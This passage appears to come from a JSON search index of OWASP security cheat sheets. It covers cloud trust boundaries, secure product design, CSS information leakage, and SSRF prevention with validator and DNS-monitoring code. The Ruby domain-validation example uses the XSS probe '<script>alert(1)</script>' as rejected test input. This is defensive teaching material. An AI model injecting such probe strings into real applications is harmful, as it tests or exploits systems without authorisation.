This could be a necessary approach for applications found in financial, military or critical infrastructure systems. However, security must be careful when advocating for this model, as it will have significant performance and maintenance drawbacks.

Pros Cons High assurance of data integrity Slow and inefficient Defense in depth Complicated Likely more expensive"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#2-high-trust-example","title":"2. High trust example","text":"

Next, consider the an opposite approach, where everything is trusted. In this instance, the \"dangerous\" user input is trusted and essentially handed directly to a high criticality business component. The auth/identity resource is not used at all. In this instance, there is higher likelihood of a successful attack against the system, because there are no controls in place to prevent it. Additionally, this setup could be considered wasteful, as both the auth/identity and ephemeral IAM servers are not necessarily performing their intended function. (These could be shared corporate resources that aren't being used to their full potential).

This is an unlikely architecture for all but the simplest and lowest risk applications. Do not use this trust boundary configuration unless there is no sensitive content to protect or efficiency is the only metric for success. Trusting user input is never recommended, even in low risk applications.

Pros Cons Efficient Insecure Simple Potentially Wasteful High risk of compromise"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#3-some-trust-example","title":"3. Some trust example","text":"

Most applications will use a trust boundary configuration like this. Using knowledge from a risk and attack surface analysis, security can reasonably assign trust to low risk components or processes, and verify only when necessary. This prevents wasting valuable security resources, but also limits the complexity and efficiency loss due to additional security overhead.

Notice in this example, that the API gateway checks the auth/identity of a user, then immediately passes the request on to the compute instance. The instance doesn't need to re-verify, and performs it's operation. However, as the compute instance is working with untrusted user inputs (designated yellow for some trust), it is still necessary to assume an ephemeral identity to access the storage system.

By nature, this approach limits the pros and cons of both previous examples. This model will likely be used for most applications, unless the benefits of the above examples are necessary to meet business requirements.

Pros Cons Secured based on risk Known gaps in security Cost/Efficiency derived from criticality

Note: This trust methodology diverges from Zero Trust. For a more in depth look at that topic, check out CISA's Zero Trust Maturity Model.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#security-tooling","title":"Security Tooling","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#web-application-firewall","title":"Web Application Firewall","text":"

Web application firewalls (WAF) are used to monitor or block common attack payloads (like XSS and SQLi), or allow only specific request types and patterns. Applications should use them as a first line of defense, attaching them to entry points like load balancers or API gateways, to handle potentially malicious content before it reaches application code. Cloud providers curate base rule sets which will block or monitor common malicious payloads:

By design these rule sets are generic and will not cover every attack type an application will face. Consider creating custom rules which will fit the application's specific security needs, like:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging-monitoring","title":"Logging & Monitoring","text":"

Logging and monitoring is required for a truly secure application. Developers should know exactly what is going on in their environment, making use of alerting mechanisms to warn engineers when systems are not working as expected. Additionally, in the event of a security incident, logging should be verbose enough to track a threat actor through an entire application, and provide enough knowledge for respondents to understand what actions were taken against what resources. Note that proper logging and monitoring can be expensive, and risk/cost trade-offs should be discussed when putting logging in place.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging","title":"Logging","text":"

For proper logging, consider:

Legal and compliance representatives should weigh in on log retention times for the specific application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

For proper monitoring consider adding:

Anomalies by count and type can vary wildly from app to app. A proper understanding of what qualifies as an anomaly requires an environment specific baseline. Therefore, the percentages mentioned above should be chosen based off that baseline, in addition to considerations like risk and team response capacity.

WAFs can also have monitoring or alerting attached to them for counting malicious payloads or (in some cases) anomalous activity detection.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#ddos-protection","title":"DDoS Protection","text":"

Cloud service companies offer a range of simple and advanced DDoS protection products, depending on application needs. Simple DDOS protection can often be employed using WAFs with rate limits and route blocking rules, while more advanced protection may require specific managed tooling offered by the cloud provider. Examples include:

The decision to enable advanced DDoS protections for a specific application should be based off risk and business criticality of application, taking into account mitigating factors and cost (these services can be very inexpensive compared to large company budgets).

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#self-managed-tooling-maintenance","title":"Self-managed tooling maintenance","text":"

Cloud providers generally offer tooling on a spectrum of management. Fully managed services leave very little for the end developer to handle besides coding functionality, while self-managed systems require much more overhead to maintain.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#update-strategy-for-self-managed-services","title":"Update Strategy for Self-managed Services","text":"

Self-managed tooling will require additional overhead by developers and support engineers. Depending on the tool, basic version updates, upgrades to images like AMIs or Compute Images, or other operating system level maintence will be required. Use automation to regularly update minor versions or images, and schedule time in development cycles for refreshing stale resources.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#avoid-gaps-in-managed-service-security","title":"Avoid Gaps in Managed Service Security","text":"

Managed services will offer some level of security, like updating and securing the underlying hardware which runs application code. However, the development team are still responsible for many aspects of security in the system. Ensure developers understand what security will be their responsibility based on tool selection. Likely the following will be partially or wholly the responsibility of the developer:

Use documentation from the cloud provider to understand which security will be the responsbility of what party. Examples of this research for serverless functions:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html","title":"Secure Product Design Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The purpose of Secure Product Design is to ensure that all products meet or exceed the security requirements laid down by the organization as part of the development lifecycle and to ensure that all security decisions made about the product being developed are explicit choices and result in the correct level of security for the product being developed.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#methodology","title":"Methodology","text":"

As a basic start, establish secure defaults, minimise the attack surface area, and fail securely to those well-defined and understood defaults.

Secure Product Design comes about through two processes:

  1. Product Inception; and
  2. Product Design

The first process happens when a product is conceived, or when an existing product is being re-invented. The latter is continuous, evolutionary, and done in an agile way, close to where the code is being written.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-principles","title":"Security Principles","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-the-principle-of-least-privilege-and-separation-of-duties","title":"1. The principle of Least Privilege and Separation of Duties","text":"

Least Privilege is a security principle that states that users should only be given the minimum amount of access necessary to perform their job. This means that users should only be given access to the resources they need to do their job, and no more. This helps to reduce the risk of unauthorized access to sensitive data or systems, as users are only able to access the resources they need. Least Privilege is an important security principle that should be followed in order to ensure the security of an organization's data and systems.

Separation of duties is a fundamental principle of internal control in business and organizations. It is a system of checks and balances that ensures that no single individual has control over all aspects of a transaction. This is done by assigning different tasks to different people, so that no one person has control over the entire process. This helps to reduce the risk of fraud and errors, as well as ensuring that all tasks are completed in a timely manner. Separation of duties is an important part of any organization's internal control system, and is essential for maintaining the integrity of the organization's financial records.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-the-principle-of-defense-in-depth","title":"2. The principle of Defense-in-Depth","text":"

The principle of Defense-in-Depth is a security strategy that involves multiple layers of security controls to protect an organization\u2019s assets. It is based on the idea that if one layer of security fails, the other layers will still be able to protect the asset. The layers of security can include physical security, network security, application security, and data security. The goal of Defense-in-Depth is to create a secure environment that is resilient to attack and can quickly detect and respond to any security incidents. By implementing multiple layers of security, organizations can reduce the risk of a successful attack and minimize the damage caused by any successful attack.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-the-principle-of-zero-trust","title":"3. The principle of Zero Trust","text":"

Zero Trust is a security model that assumes that all users, devices, and networks are untrusted and must be verified before access is granted. It is based on the idea that organizations should not trust any user, device, or network, even if they are inside the organization\u2019s network. Instead, all requests for access must be authenticated and authorized before access is granted. Zero Trust also requires organizations to continuously monitor and audit user activity to ensure that access is only granted to those who need it. This model is designed to reduce the risk of data breaches and other security incidents by ensuring that only authorized users have access to sensitive data.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-the-principle-of-security-in-the-open","title":"4. The principle of Security-in-the-Open","text":"

Security-in-the-Open is a concept that emphasizes the importance of security in open source software development. It focuses on the need for developers to be aware of the security implications of their code and to take steps to ensure that their code is secure. This includes using secure coding practices, testing for vulnerabilities, and using secure development tools. Security-in-the-Open also encourages developers to collaborate with security experts to ensure that their code is secure.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-focus-areas","title":"Security Focus Areas","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-context","title":"1. Context","text":"

Where does this application under consideration fit into the ecosystem of the organization, which departments use it and for what reason? What kinds of data might it contain, and what is the risk profile as a result?

The processes employed to build the security context for an application include Threat Modeling - which results in security related stories being added during Product Design at every iteration of product delivery - and when performing a Business Impact Assessment - which results in setting the correct Product Security Levels for a given product during Product Inception.

Context is all important because over-engineering for security can have even greater cost implications than over-engineering for scale or performance, but under-engineering can have devastating consequences too.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-components","title":"2. Components","text":"

From libraries in use by the application (selected during any Product Design stage) through to external services it might make use of (changing of which happen during Product Inception), what makes up this application and how are those parts kept secure? In order to do this we leverage a library of secure design patterns and ready to use components defined in your Golden Path / Paved Road documentation and by analyzing those choices through Threat Modeling.

A part of this component review must also include the more commercial aspects of selecting the right components (licensing and maintenance) as well as the limits on usage that might be required.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-connections","title":"3. Connections","text":"

How do you interact with this application and how does it connect to those components and services mentioned before? Where is the data stored and how is it accessed? Connections can also describe any intentional lack of connections. Think about the segregation of tiers that might be required depending on the Product Security Levels required and the potential segregation of data or whole environments if required for different tenants.

Adding (or removing) connections is probably a sign that Product Inception is happening.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-code","title":"4. Code","text":"

Code is the ultimate expression of the intention for a product and as such it must be functional first and foremost. But there is a quality to how that functionality is provided that must meet or exceed the expectations of it.

Some basics of secure coding include:

  1. Input validation: Verify that all input data is valid and of the expected type, format, and length before processing it. This can help prevent attacks such as SQL injection and buffer overflows.
  2. Error handling: Handle errors and exceptions in a secure manner, such as by logging them in a secure way and not disclosing sensitive information to an attacker.
  3. Authentication and Authorization: Implement strong authentication and authorization mechanisms to ensure that only authorized users can access sensitive data and resources.
  4. Cryptography: Use cryptographic functions and protocols to protect data in transit and at rest, such as HTTPS and encryption - the expected levels for a given Product Security Level can often be found by reviewing your Golden Path / Paved Road documentation.
  5. Least privilege: Use the principle of the least privilege when writing code, such that the code and the system it runs on are given the minimum access rights necessary to perform their functions.
  6. Secure memory management: Use high-level languages recommended in your Golden Path / Paved Road documentation or properly manage memory to prevent memory-related vulnerabilities such as buffer overflows and use-after-free.
  7. Avoiding hardcoded secrets: Hardcoded secrets such as passwords and encryption keys should be avoided in the code and should be stored in a secure storage.
  8. Security testing: Test the software for security vulnerabilities during development and just prior to deployment.
  9. Auditing and reviewing the code: Regularly audit and review the code for security vulnerabilities, such as by using automated tools or having a third party review the code.
  10. Keeping up-to-date: Keep the code up-to-date with the latest security best practices and vulnerability fixes to ensure that the software is as secure as possible.

Ensure that you integrate plausibility checks at each tier of your application (e.g., from frontend to backend) and ensure that you write unit and integration tests to validate that all threats discovered during Threat Modeling have been mitigated to a level of risk acceptable to the organization. Use that to compile use-cases and abuse-cases for each tier of your application.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#5-configuration","title":"5. Configuration","text":"

Building an application securely can all too easily be undone if it's not securely configured. At a minimum we should ensure the following:

  1. Bearing in mind the principle of Least Privilege: Limit the access and permissions of system components and users to the minimum required to perform their tasks.
  2. Remembering Defense-in-Depth: Implement multiple layers of security controls to protect against a wide range of threats.
  3. Ensuring Secure by Default: Configure systems and software to be secure by default, with minimal manual setup or configuration required.
  4. Secure Data: Protect sensitive data, such as personal information and financial data, by encrypting it in transit and at rest. Protecting that data also means ensuring it's correctly backed up and that the data retention is set correctly for the desired Product Security Level.
  5. Plan to have the configuration Fail Securely: Design systems to fail in a secure state, rather than exposing vulnerabilities when they malfunction.
  6. Always use Secure Communications: Use secure protocols for communication, such as HTTPS, to protect against eavesdropping and tampering.
  7. Perform regular updates - or leverage maintained images: Keeping software, docker images and base operating systems up-to-date with the latest security patches is an essential part of maintaining a secure system.
  8. Have a practiced Security Incident response plan: Having a plan in place for how to respond to a security incident is essential for minimizing the damage caused by any successful attack and a crucial part of the Product Support Model.

Details of how to precisely ensure secure configuration can be found in Infrastructure as Code Security Cheat Sheet

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html","title":"Securing Cascading Style Sheets Cheat Sheet","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal of this CSS (Not XSS, but Cascading Style Sheet) Cheat Sheet is to inform Programmers, Testers, Security Analysts, Front-End Developers and anyone who is interested in Web Application Security to use these recommendations or requirements in order to achieve better security when authoring Cascading Style Sheets.

Let's demonstrate this risk with an example:

Santhosh is a programmer who works for a company called X and authors a Cascading Style Sheet to implement styling of the web application. The application for which he is writing CSS Code has various roles like Student, Teacher, Super User & Administrator and these roles have different permissions (PBAC - Permission Based Access Control) and Roles (RBAC - Role Based Access Control). Not only do these roles have different access controls, but these roles could also have different styling for webpages that might be specific to an individual or group of roles.

Santhosh thinks that it would a great optimized idea to create a \"global styling\" CSS file which has all the CSS styling/selectors for all of the roles. According to their role, a specific feature or user interface element will be rendered. For instance, Administrator will have different features compared to Student or Teacher or SuperUser. However, some permissions or features maybe common to some roles.

Example: Profile Settings will be applicable to all the users here while Adding Users or Deleting Users is only applicable for Administrator.

Example:

Now, let's examine what are the risks associated with this style of coding.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-1","title":"Risk #1","text":"

Motivated Attackers always take a look at *.CSS files to learn the features of the application even without being logged in.

For instance: Jim is a motivated attacker and always tries to look into CSS files from the View-Source even before other attacks. When Jim looks into the CSS file, they see that there are different features and different roles based on the CSS selectors like .profileSettings, .editUser, .addUser, .deleteUser and so on. Jim can use the CSS for intel gathering to help gain access to sensitive roles. This is a form of attacker due diligence even before trying to perform dangerous attacks to gain access to the web application.

In a nutshell, having global styling could reveal sensitive information that could be beneficial to the attacker.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-2","title":"Risk #2","text":"

Let's say, Santhosh has this habit of writing the descriptive selector names like .profileSettings, exportUserData, .changePassword, .oldPassword, .newPassword, .confirmNewPassword etc. Good programmers like to keep code readable and usable by other Code Reviewers of the team. The risk is that attackers could map these selectors to actual features of a web application.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defensive-mechanisms-to-mitigate-attackers-motivation","title":"Defensive Mechanisms to Mitigate Attacker's Motivation","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-1","title":"Defense Mechanism #1","text":"

As a CSS Coder / Programmer, always keep the CSS isolated by access control level. By this, it means Student will have a different CSS file called as StudentStyling.CSS while Administrator has AdministratorStyling.CSS and so on. Make sure these *.CSS files are accessed only for a user with the proper access control level. Only users with the proper access control level should be able to access their *.CSS file.

If an authenticated user with the Student Role tries to access AdministratorStyling.CSS through forced browsing, an alert that an intrusion is occurring should be recorded.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-2","title":"Defense Mechanism #2","text":"

Another option is to modify your CSS files to remove any identifying information. As a general rule, it's recommended that your website have a consistent style between pages, and it's best to write your general CSS rules in such a way that they apply across multiple pages. This reduces the need for specific selectors in the first place. Furthermore, it's often possible to create CSS selectors that target specific HTML elements without using IDs or class names. For example, #UserPage .Toolbar .addUserButton could be rewritten to something more obscure such as #page_u header button:first-of-type.

Build-time and runtime tools also exist, which can be integrated to obfuscate your class names. This can reduce the chance of an attacker guessing the features of your application. Some examples:

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-3","title":"Defense Mechanism #3","text":"

Web applications that allow users to author content via HTML input could be vulnerable to malicious use of CSS. Uploaded HTML could use styles that are allowed by the web application but could be used for purposes other than intended which could lead to security risks.

Example: You can read about how LinkedIn had a vulnerability which allowed malicious use of CSS to execute a Clickjacking attack. This caused the document to enter a state where clicking anywhere on the page would result in loading a potentially malicious website. You can read more about mitigating clickjacking attacks here.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Server-Side Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of the cheat sheet is to provide advices regarding the protection against Server Side Request Forgery (SSRF) attack.

This cheat sheet will focus on the defensive point of view and will not explain how to perform this attack. This talk from the security researcher Orange Tsai as well as this document provide techniques on how to perform this kind of attack.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

SSRF is an attack vector that abuses an application to interact with the internal/external network or the machine itself. One of the enablers for this vector is the mishandling of URLs, as showcased in the following examples:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#overview-of-a-ssrf-common-flow","title":"Overview of a SSRF common flow","text":"

Notes:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#cases","title":"Cases","text":"

Depending on the application's functionality and requirements, there are two basic cases in which SSRF can happen:

Because these two cases are very different, this cheat sheet will describe defences against them separately.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-1-application-can-send-request-only-to-identified-and-trusted-applications","title":"Case 1 - Application can send request only to identified and trusted applications","text":"

Sometimes, an application needs to perform a request to another application, often located on another network, to perform a specific task. Depending on the business case, user input is required for the functionality to work.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#example","title":"Example","text":"

Take the example of a web application that receives and uses personal information from a user, such as their first name, last name, birth date etc. to create a profile in an internal HR system. By design, that web application will have to communicate using a protocol that the HR system understands to process that data. Basically, the user cannot reach the HR system directly, but, if the web application in charge of receiving user information is vulnerable to SSRF, the user can leverage it to access the HR system. The user leverages the web application as a proxy to the HR system.

The allow list approach is a viable option since the internal application called by the VulnerableApplication is clearly identified in the technical/business flow. It can be stated that the required calls will only be targeted between those identified and trusted applications.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections","title":"Available protections","text":"

Several protective measures are possible at the Application and Network layers. To apply the defense in depth principle, both layers will be hardened against such attacks.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer","title":"Application layer","text":"

The first level of protection that comes to mind is Input validation.

Based on that point, the following question comes to mind: How to perform this input validation?

As Orange Tsai shows in his talk, depending on the programming language used, parsers can be abused. One possible countermeasure is to apply the allow list approach when input validation is used because, most of the time, the format of the information expected from the user is globally known.

The request sent to the internal application will be based on the following information:

Note: Disable the support for the following of the redirection in your web client in order to prevent the bypass of the input validation described in the section Exploitation tricks > Bypassing restrictions > Input validation > Unsafe redirect of this document.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#string","title":"String","text":"

In the context of SSRF, validations can be added to ensure that the input string respects the business/technical format expected.

A regex can be used to ensure that data received is valid from a security point of view if the input data have a simple format (e.g. token, zip code, etc.). Otherwise, validation should be conducted using the libraries available from the string object because regex for complex formats are difficult to maintain and are highly error-prone.

User input is assumed to be non-network related and consists of the user's personal information.

Example:

//Regex validation for a data having a simple format\nif(Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput)){\n//Continue the processing because the input data is valid\n}else{\n//Stop the processing and reject the request\n}\n
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#ip-address","title":"IP address","text":"

In the context of SSRF, there are 2 possible validations to perform:

  1. Ensure that the data provided is a valid IP V4 or V6 address.
  2. Ensure that the IP address provided belongs to one of the IP addresses of the identified and trusted applications.

The first layer of validation can be applied using libraries that ensure the security of the IP address format, based on the technology used (library option is proposed here to delegate the managing of the IP address format and leverage battle-tested validation function):

Verification of the proposed libraries has been performed regarding the exposure to bypasses (Hex, Octal, Dword, URL and Mixed encoding) described in this article.

Use the output value of the method/library as the IP address to compare against the allow list.

After ensuring the validity of the incoming IP address, the second layer of validation is applied. An allow list is created after determining all the IP addresses (v4 and v6 to avoid bypasses) of the identified and trusted applications. The valid IP is cross-checked with that list to ensure its communication with the internal application (string strict comparison with case sensitive).

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#domain-name","title":"Domain name","text":"

In the attempt of validate domain names, it is apparent to do a DNS resolution to verify the existence of the domain. In general, it is not a bad idea, yet it opens up the application to attacks depending on the configuration used regarding the DNS servers used for the domain name resolution:

In the context of SSRF, there are two validations to perform:

  1. Ensure that the data provided is a valid domain name.
  2. Ensure that the domain name provided belongs to one of the domain names of the identified and trusted applications (the allow listing comes to action here).

Similar to the IP address validation, the first layer of validation can be applied using libraries that ensure the security of the domain name format, based on the technology used (library option is proposed here in order to delegate the managing of the domain name format and leverage battle tested validation function):

Verification of the proposed libraries has been performed to ensure that the proposed functions do not perform any DNS resolution query.

Example of execution of the proposed regex for Ruby:

domain_names = [\"owasp.org\",\"owasp-test.org\",\"doc-test.owasp.org\",\"doc.owasp.org\",\n\"<script>alert(1)</script>\",\"<script>alert(1)</script>.owasp.org\"]\ndomain_names.each { |domain_name|\nif ( domain_name =~ /^(((?!-))(xn--|_{1,1})?[a-z0-9-]{0,61}[a-z0-9]{1,1}\\.)*(xn--)?([a-z0-9][a-z0-9\\-]{0,60}|[a-z0-9-]{1,30}\\.[a-z]{2,})$/ )\nputs \"[i] #{domain_name} is VALID\"\nelse\nputs \"[!] #{domain_name} is INVALID\"\nend\n}\n
$ ruby test.rb\n[i] owasp.org is VALID\n[i] owasp-test.org is VALID\n[i] doc-test.owasp.org is VALID\n[i] doc.owasp.org is VALID\n[!] <script>alert(1)</script> is INVALID\n[!] <script>alert(1)</script>.owasp.org is INVALID\n

After ensuring the validity of the incoming domain name, the second layer of validation is applied:

  1. Build an allow list with all the domain names of every identified and trusted applications.
  2. Verify that the domain name received is part of this allow list (string strict comparison with case sensitive).

Unfortunately here, the application is still vulnerable to the DNS pinning bypass mentioned in this document. Indeed, a DNS resolution will be made when the business code will be executed. To address that issue, the following action must be taken in addition of the validation on the domain name:

  1. Ensure that the domains that are part of your organization are resolved by your internal DNS server first in the chains of DNS resolvers.
  2. Monitor the domains allow list in order to detect when any of them resolves to a/an:
  3. Local IP address (V4 + V6).
  4. Internal IP of your organization (expected to be in private IP ranges) for the domain that are not part of your organization.

The following Python3 script can be used, as a starting point, for the monitoring mentioned above:

# Dependencies: pip install ipaddress dnspython\nimport ipaddress\nimport dns.resolver\n\n# Configure the allow list to check\nDOMAINS_ALLOWLIST = [\"owasp.org\", \"labslinux\"]\n\n# Configure the DNS resolver to use for all DNS queries\nDNS_RESOLVER = dns.resolver.Resolver()\nDNS_RESOLVER.nameservers = [\"1.1.1.1\"]\n\ndef verify_dns_records(domain, records, type):\n\"\"\"\n    Verify if one of the DNS records resolve to a non public IP address.\n    Return a boolean indicating if any error has been detected.\n    \"\"\"\n    error_detected = False\n    if records is not None:\n        for record in records:\n            value = record.to_text().strip()\n            try:\n                ip = ipaddress.ip_address(value)\n                # See https://docs.python.org/3/library/ipaddress.html#ipaddress.IPv4Address.is_global\n                if not ip.is_global:\n                    print(\"[!] DNS record type '%s' for domain name '%s' resolve to\n                    a non public IP address '%s'!\" % (type, domain, value))\n                    error_detected = True\n            except ValueError:\n                error_detected = True\n                print(\"[!] '%s' is not valid IP address!\" % value)\n    return error_detected\n\ndef check():\n\"\"\"\n    Perform the check of the allow list of domains.\n    Return a boolean indicating if any error has been detected.\n    \"\"\"\n    error_detected = False\n    for domain in DOMAINS_ALLOWLIST:\n        # Get the IPs of the current domain\n        # See https://en.wikipedia.org/wiki/List_of_DNS_record_types\n        try:\n            # A = IPv4 address record\n            ip_v4_records = DNS_RESOLVER.query(domain, \"A\")\n        except Exception as e:\n            ip_v4_records = None\n            print(\"[i] Cannot get A record for domain '%s': %s\\n\" % (domain,e))\n        try:\n            # AAAA = IPv6 address record\n            ip_v6_records = DNS_RESOLVER.query(domain, \"AAAA\")\n        except Exception as e:\n            ip_v6_records = None\n            print(\"[i] Cannot get AAAA record for domain '%s': %s\\n\" % (domain,e))\n        # Verify the IPs obtained\n        if verify_dns_records(domain, ip_v4_records, \"A\")\n        or verify_dns_records(domain, ip_v6_records, \"AAAA\"):\n            error_detected = True\n    return error_detected\n\nif __name__== \"__main__\":\n    if check():\n        exit(1)\n    else:\n        exit(0)\n
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#url","title":"URL","text":"

Do not accept complete URLs from the user because URL are difficult to validate and the parser can be abused depending on the technology used as showcased by the following talk of Orange Tsai.

If network related information is really needed then only accept a valid IP address or domain name.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer","title":"Network layer","text":"

The objective of the Network layer security is to prevent the VulnerableApplication from performing calls to arbitrary applications. Only allowed routes will be available for this application in order to limit its network access to only those that it should communicate with.

The Firewall component, as a specific device or using the one provided within the operating system, will be used here to define the legitimate flows.

In the schema below, a Firewall component is leveraged to limit the application's access, and in turn, limit the impact of an application vulnerable to SSRF:

Network segregation (see this set of implementation advice can also be leveraged and is highly recommended in order to block illegitimate calls directly at network level itself.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-2-application-can-send-requests-to-any-external-ip-address-or-domain-name","title":"Case 2 - Application can send requests to ANY external IP address or domain name","text":"

This case happens when a user can control a URL to an External resource and the application makes a request to this URL (e.g. in case of WebHooks). Allow lists cannot be used here because the list of IPs/domains is often unknown upfront and is dynamically changing.

In this scenario, External refers to any IP that doesn't belong to the internal network, and should be reached by going over the public internet.

Thus, the call from the Vulnerable Application:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#challenges-in-blocking-urls-at-application-layer","title":"Challenges in blocking URLs at application layer","text":"

Based on the business requirements of the above mentioned applications, the allow list approach is not a valid solution. Despite knowing that the block-list approach is not an impenetrable wall, it is the best solution in this scenario. It is informing the application what it should not do.

Here is why filtering URLs is hard at the Application layer:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections_1","title":"Available protections","text":"

Taking into consideration the same assumption in the following example for the following sections.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer_1","title":"Application layer","text":"

Like for the case n\u00b01, it is assumed that the IP Address or domain name is required to create the request that will be sent to the TargetApplication.

The first validation on the input data presented in the case n\u00b01 on the 3 types of data will be the same for this case BUT the second validation will differ. Indeed, here we must use the block-list approach.

Regarding the proof of legitimacy of the request: The TargetedApplication that will receive the request must generate a random token (ex: alphanumeric of 20 characters) that is expected to be passed by the caller (in body via a parameter for which the name is also defined by the application itself and only allow characters set [a-z]{1,10}) to perform a valid request. The receiving endpoint must only accept HTTP POST requests.

Validation flow (if one the validation steps fail then the request is rejected):

  1. The application will receive the IP address or domain name of the TargetedApplication and it will apply the first validation on the input data using the libraries/regex mentioned in this section.
  2. The second validation will be applied against the IP address or domain name of the TargetedApplication using the following block-list approach:
  3. For IP address:
  4. For domain name: 1. The application will verify that it is a public one by trying to resolve the domain name against the DNS resolver that will only resolve internal domain name. Here, it must return a response indicating that it do not know the provided domain because the expected value received must be a public domain. 2. To prevent the DNS pinning attack described in this document, the application will retrieve all the IP addresses behind the domain name provided (taking records A + AAAA for IPv4 + IPv6) and it will apply the same verification described in the previous point about IP addresses.
  5. The application will receive the protocol to use for the request via a dedicated input parameter for which it will verify the value against an allowed list of protocols (HTTP or HTTPS).
  6. The application will receive the parameter name for the token to pass to the TargetedApplication via a dedicated input parameter for which it will only allow the characters set [a-z]{1,10}.
  7. The application will receive the token itself via a dedicated input parameter for which it will only allow the characters set [a-zA-Z0-9]{20}.
  8. The application will receive and validate (from a security point of view) any business data needed to perform a valid call.
  9. The application will build the HTTP POST request using only validated information and will send it (don't forget to disable the support for redirection in the web client used).
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer_1","title":"Network layer","text":"

Similar to the following section.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#imdsv2-in-aws","title":"IMDSv2 in AWS","text":"

In cloud environments SSRF is often used to access and steal credentials and access tokens from metadata services (e.g. AWS Instance Metadata Service, Azure Instance Metadata Service, GCP metadata server).

IMDSv2 is an additional defence-in-depth mechanism for AWS that mitigates some of the instances of SSRF.

To leverage this protection migrate to IMDSv2 and disable old IMDSv1. Check out AWS documentation for more details.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase. Checkout the Semgrep rule for SSRF to identify/investigate for SSRF vulnerabilities in Java https://semgrep.dev/salecharohit:owasp_java_ssrf

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":"

Online version of the SSRF bible (PDF version is used in this cheat sheet).

Article about Bypassing SSRF Protection.

Articles about SSRF attacks: Part 1, part 2 and part 3.

Article about IMDSv2

